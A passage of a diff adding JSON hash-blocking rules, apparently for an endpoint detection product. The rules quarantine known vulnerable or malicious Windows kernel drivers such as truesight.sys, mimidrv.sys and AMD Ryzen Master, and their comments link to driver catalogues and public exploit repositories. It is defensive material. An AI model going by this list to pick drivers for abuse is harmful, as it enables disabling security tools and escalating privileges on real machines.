+ "value": "f8aeb50a115b4d35f15f876eb1a6e5ee5f3a142de12eec50b6bdf81196ffbea4",
+ "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "93994cca-607b-5ef0-b432-9fa288fde46e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.495707Z",
+ "creation_date": "2026-03-23T11:45:31.495709Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.495714Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "92def912354238e7a5c2ad0184f27b4fbbba1b7d6a8741aa9677ce3bf13785d1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "93b266cc-084b-554f-8e3e-14e3fb27b0ca",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.826244Z",
+ "creation_date": "2026-03-23T11:45:30.826246Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.826252Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fcc4501b82401f4c01f2b016a258cb7627660d1284ba870ec426e804eeb5d53e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "93b34222-eaaf-5c9f-9ab0-f823633e6aa0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.820463Z",
+ "creation_date": "2026-03-23T11:45:31.820467Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.820475Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8430d5a27a590697fe71308aff46f6fea1482ed110c55014c050642618f58214",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "93c08e85-33ba-5ce5-82e2-fb4ba445273f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.822918Z",
+ "creation_date": "2026-03-23T11:45:31.822921Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.822929Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "65972828f8ccff5b09940cf0336d0ca4b812222e53f1718d974d06bedfa074cf",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "93c42949-b058-560e-8022-5e25fd5e3afd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.976570Z",
+ "creation_date": "2026-03-23T11:45:29.976572Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.976577Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "565733b6e6d8f7b9661f04a3b4f29372f5dec080512551204b92ac4916a144cb",
+ "comment": "Malicious attestation-signed Drivers (aka NodeDriver.sys, 4.sys, Air_SYSTEM10.sys etc.) [https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "93cd02e4-7528-581b-a8c4-f804497884ff",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.473763Z",
+ "creation_date": "2026-03-23T11:45:31.473767Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.473777Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3d1e408acb91b4053ed463244bf095670e12cc28d0fee927a638451ae049fcdc",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "93cd1e20-2585-5ce5-9a46-45ce6c7a93c9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.829812Z",
+ "creation_date": "2026-03-23T11:45:31.829815Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.829824Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ac9a215dc3bec6b9f987bae02fdb90f14ec3ef8a0490b48c40f5317691ee4898",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "93d0c301-7e70-58b0-93ce-0cb85870abac",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.835518Z",
+ "creation_date": "2026-03-23T11:45:30.835520Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.835526Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0f38eb237a6e698b504a8763a6cb0223726b17807969a12bc6bd17f66057cd42",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "93e6eecd-85dc-5322-9ac2-a7b7d21654b7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.985216Z",
+ "creation_date": "2026-03-23T11:45:29.985218Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.985223Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6b11aa02ee9e5cb9b6d20aff4f548187f6095b63c5a6215c08b8c2ae69a7a62c",
+ "comment": "Dangerous Physmem Kernel Driver (aka HwRwDrv.Sys) [https://www.loldrivers.io/drivers/e4609b54-cb25-4433-a75a-7a17f43cec00/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "93f19e7d-1c83-5522-9e96-8d8c7802bbc3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.833345Z",
+ "creation_date": "2026-03-23T11:45:30.833348Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.833357Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c348b0d8d702748fa01443cc735b14de2ad65820f7218f9ffd02692d7eee626a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "93f3d45a-0b98-5d5c-8952-d5f790d719eb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.832115Z",
+ "creation_date": "2026-03-23T11:45:30.832117Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.832123Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5238c3912c3969d9a005e2525d501a55d177961529b29a54e4d97d235cc65913",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "93feb702-d1ab-54f5-a2e6-5e2b746d7468",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.477432Z",
+ "creation_date": "2026-03-23T11:45:30.477435Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.477444Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "83a1fabf782d5f041132d7c7281525f6610207b38f33ff3c5e44eb9444dd0cbc",
+ "comment": "Vulnerable Kernel Driver (aka elbycdio.sys) [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "93fedf1e-2b94-5a02-a62d-3dcea9a8cd21",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.490084Z",
+ "creation_date": "2026-03-23T11:45:31.490086Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.490092Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "dff9d896a6d9c5e4ad62212f502035c481062a9b7c19fd54658fead161d6a371",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9409edb9-580f-55a9-be15-3069f798b8e1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.976982Z",
+ "creation_date": "2026-03-23T11:45:29.976984Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.976990Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "762989dc8ea7a6c5928254676052343ab1a15be2fd5ec3ded5f72487127ee590",
+ "comment": "Malicious Windows Kernel Explorer Driver (aka WindowsKernelExplorer.sys) [https://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "94129283-00ce-5d94-a24d-75ab2897182c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.975343Z",
+ "creation_date": "2026-03-23T11:45:29.975345Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.975350Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a076e66065161bdca4680f0f3a3d0767a25c344fa25cc64473f4ef4f926898ef",
+ "comment": "Vulnerable AMD Ryzen Master Driver (aka AMDRyzenMasterDriver.sys) [CVE-2020-12928, CVE-2023-20564] [https://www.loldrivers.io/drivers/13973a71-412f-4a18-a2a6-476d3853f8de/, https://github.com/tijme/amd-ryzen-master-driver-v17-exploit, https://github.com/zeze-zeze/HITCON-2023-Demo-CVE-2023-20562] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "941f0bfb-c9e8-5e10-a4f3-8a7d5a46eb9e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.457478Z",
+ "creation_date": "2026-03-23T11:45:30.457482Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.457491Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3e1f592533625bf794e0184485a4407782018718ae797103f9e968ff6f0973a1",
+ "comment": "Vulnerable Kernel Driver (aka rtkio64.sys ) [https://www.loldrivers.io/drivers/8d3f27bd-c3fd-48d0-913a-e2caa6fbd025/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "94239da6-2175-5b8d-8a68-df842b72d335",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.612403Z",
+ "creation_date": "2026-03-23T11:45:29.612404Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.612410Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "673bcec3d53fab5efd6e3bac25ac9d6cc51f6bbdf8336e38aade2713dc1ae11b",
+ "comment": "ASUS WinFlash vulnerable driver (aka ATSZIO.sys and ATSZIO64.sys) [https://github.com/Chigusa0w0/AsusDriversPrivEscala/blob/master/ATSZIO.md] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9450e6ff-4fce-5edc-88e9-e035eeb71eac",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.604283Z",
+ "creation_date": "2026-03-23T11:45:29.604285Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.604290Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ac76256f8ca6608abe84ca194d46bc581706ecc6813e1abe5fa2b6cc3b4bdade",
+ "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "945746b8-d2c9-5696-96c2-fd9626d702c1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.159288Z",
+ "creation_date": "2026-03-23T11:45:31.159292Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.159301Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f11891bc187a7a7ce69f67866216c3a3a2579c3ed8c8a011ad61eb5e1e811f80",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9463724d-da4d-5296-b4e0-7f6959991a3a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.825716Z",
+ "creation_date": "2026-03-23T11:45:31.825718Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.825724Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cd78008c060e3613053cbccdab514f3622d66bbca32800a00a2c3e7dddf19899",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "946a3ca8-625b-54e3-afb1-08ef8f457652",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.469658Z",
+ "creation_date": "2026-03-23T11:45:30.469661Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.469671Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "77d7a8efe05ab7041fa33280f271edca9fa46c074885de5d03f4cbf343e65f2d",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "948adb32-87a7-53ee-87ce-2a23c59ac824",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.817435Z",
+ "creation_date": "2026-03-23T11:45:30.817437Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.817443Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cb3dd0482092eb019dc11797dcf09f69fb3f06330e1fba0047678b226b57c2cd",
